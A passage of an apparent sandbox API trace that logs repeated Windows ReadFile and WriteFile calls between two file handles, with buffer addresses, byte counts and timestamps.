lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.695] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.696] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x356, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.696] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.697] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.697] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.697] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x358, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.698] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.698] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.699] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x7b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.699] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.700] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.701] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.701] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.702] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ed, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.702] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.703] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3cd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.703] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.704] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.704] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.705] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x304, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.705] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.706] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.706] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.707] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.707] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1b3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.708] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.708] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.709] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.710] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.710] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.711] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.711] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.712] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x358, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.712] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.713] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.713] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.714] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.714] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.715] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.715] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.716] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.716] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x254, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.717] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.717] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.718] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x249, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.718] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.719] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.719] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x203, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.720] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.720] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.721] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.722] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.722] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.722] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.723] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.724] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.724] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.725] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.725] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.726] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x96, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.726] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.727] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.727] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.728] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.728] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x9f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.729] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.729] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.730] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.730] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.731] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.731] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.732] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.732] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x6e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.733] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.733] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.734] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.734] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.735] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.735] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x218, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.736] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.736] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.737] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.737] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.738] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.738] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.739] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x10b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.739] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.740] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.740] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.741] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x17d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.741] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.742] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.742] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ad, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.743] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.743] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.744] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x84, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.744] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.745] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.745] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.746] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, 